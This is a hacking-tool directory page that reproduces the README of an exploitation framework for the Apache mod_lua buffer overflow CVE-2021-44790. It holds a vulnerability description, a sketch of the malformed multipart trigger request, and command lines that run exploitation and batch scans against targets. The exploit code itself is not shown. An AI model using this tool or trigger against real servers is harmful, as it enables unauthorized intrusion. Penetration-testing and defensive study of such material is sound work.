Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacyΒ© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790 β€” Apache HTTP Server 2.4.x mod_lua Buffer Overflow (CVE-2021-44790) - Advanced exploitation framework with fingerprinting, multi-stage scanning, plugin architecture, professional reporting, screenshot capture, SQLite database, and 95%+ confidence detection. Author: Sudeepa Wanigarathna. | Kitploit
Tools/GitHubGitHub/cerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790
Web Vulnerability ScannersExploit FrameworksExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubcerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790

Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

View Repository
1301 month agoNot yet reviewed

Most Popular

View all β†’

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools β†’

About

Apache HTTP Server 2.4.x mod_lua Buffer Overflow (CVE-2021-44790) - Advanced exploitation framework with fingerprinting, multi-stage scanning, plugin architecture, professional reporting, screenshot capture, SQLite database, and 95%+ confidence detection. Author: Sudeepa Wanigarathna.

Share

πŸ”₯ CVE-2021-44790 - Apache mod_lua Buffer Overflow Exploitation

Version Python License CVE Apache CVSS Author


πŸ“‹ Overview

Apache mod_lua Buffer Overflow Exploitation is an advanced, enterprise-grade exploitation platform for CVE-2021-44790 - a critical buffer overflow vulnerability in the Apache HTTP Server 2.4.x mod_lua module. This framework provides comprehensive fingerprinting, intelligent script discovery, multi-stage scanning, and professional reporting capabilities with 95%+ confidence detection.

⚑ Key Features

FeatureDescription
πŸ” Advanced FingerprintingApache version, mod_lua, OS, architecture, WAF, CDN, container, cloud provider detection
🎯 Intelligent Discovery7+ discovery techniques including robots.txt, sitemap, HTML parsing, JavaScript extraction
πŸ’₯ Multi-Stage ScanningConnection β†’ Fingerprint β†’ Discovery β†’ Verification β†’ Exploitation β†’ Reporting
🧩 Extensible Plugin SystemEasy plugin development for future CVEs
🌐 Smart HTTP EngineConnection pooling, retries, HTTP/2 support, rate limiting
πŸ“Š Comprehensive ReportingJSON, HTML, Markdown, PDF with interactive dashboards
🎨 Beautiful Terminal UIRich library with progress bars, tables, and color-coded output
πŸ’Ύ Research DatabaseSQLite storage with complete scan history and query support
πŸ“Έ Screenshot CaptureAutomatic webpage screenshots for evidence collection
πŸš€ High Performance20+ concurrent threads, 100+ connection pools

🎯 Vulnerability Details

AttributeValue
CVE IDCVE-2021-44790
VulnerabilityBuffer Overflow (Integer Underflow)
Affected SoftwareApache HTTP Server 2.4.0 through 2.4.51
Fixed VersionApache HTTP Server 2.4.52 and later
Componentmod_lua module
Attack VectorNetwork (Remote)
CVSS Score9.8 (Critical)
Confidentiality ImpactHigh
Integrity ImpactHigh
Availability ImpactHigh
Exploit MaturityProof-of-Concept Available

Technical Description

The vulnerability exists in the mod_lua module when processing multipart/form-data requests. An integer underflow in the lua_request_parsebody() function can lead to a heap-based buffer overflow, potentially allowing remote code execution.

POST /process.lua HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=4

4
Content-Disposition: form-data; name="name"

0
4

πŸ“Έ Screenshots

Main InterfaceFingerprint Results
Scan ProgressHTML Report Dashboard

πŸš€ Quick Start

Installation

# Clone the repository
git clone https://github.com/CerberusMrXi/Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
cd Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

# Install dependencies
pip install -r requirements.txt

# Verify installation
python3 exploit.py --version

Basic Usage

# Quick vulnerability scan
python3 exploit.py http://target.com

# Verbose scan with exploitation
python3 exploit.py https://target.com --exploit --verbose

# Generate all reports
python3 exploit.py http://target.com --report all

# Research mode with database
python3 exploit.py http://target.com --research

πŸ“‹ Detailed Usage

Command Line Options

python3 exploit.py [TARGET] [OPTIONS]
OptionDescriptionExample
TARGETTarget URLhttp://target.com
--config FILEConfiguration file--config config.yaml
--threads NNumber of threads--threads 30
--timeout NRequest timeout (seconds)--timeout 15
--proxy URLProxy URL--proxy http://127.0.0.1:8080
--verboseVerbose output--verbose
--scan-onlyScan without exploitation--scan-only
--exploitEnable exploitation--exploit
--all-payloadsUse all payloads--all-payloads
--report FORMATReport format (json/html/markdown/all)--report all
--output DIROutput directory--output /path/to/reports/
--researchEnable research mode--research
--database FILEDatabase path--database luastorm.db
--screenshotTake screenshots--screenshot
--batch FILEBatch file with targets--batch targets.txt
--query SQLExecute database query--query "SELECT * FROM targets"

Examples

1. Basic Vulnerability Assessment

python3 exploit.py https://example.com --verbose --report all

2. Corporate Environment Scan

python3 exploit.py https://internal-server.com \
    --proxy http://proxy.corp.com:8080 \
    --threads 10 \
    --timeout 15 \
    --verbose \
    --report all \
    --output /var/log/security/

3. Full Penetration Test

python3 exploit.py https://client.com \
    --threads 30 \
    --timeout 10 \
    --exploit \
    --all-payloads \
    --report all \
    --screenshot \
    --research \
    --verbose \
    --output /pentest/client_name/

4. Batch Scanning

python3 exploit.py --batch targets.txt --config config.yaml

5. Database Queries

# Show all vulnerable targets
python3 exploit.py --query "SELECT * FROM targets WHERE vulnerable=1"

# Get statistics
python3 exploit.py --query "SELECT COUNT(*) as total, SUM(vulnerable) as vulnerable FROM targets"

βš™οΈ Configuration

config.yaml

# ----------------------------------------------------------------------------
# LuaStorm Exploit Framework - Configuration File
# ----------------------------------------------------------------------------
Download Tool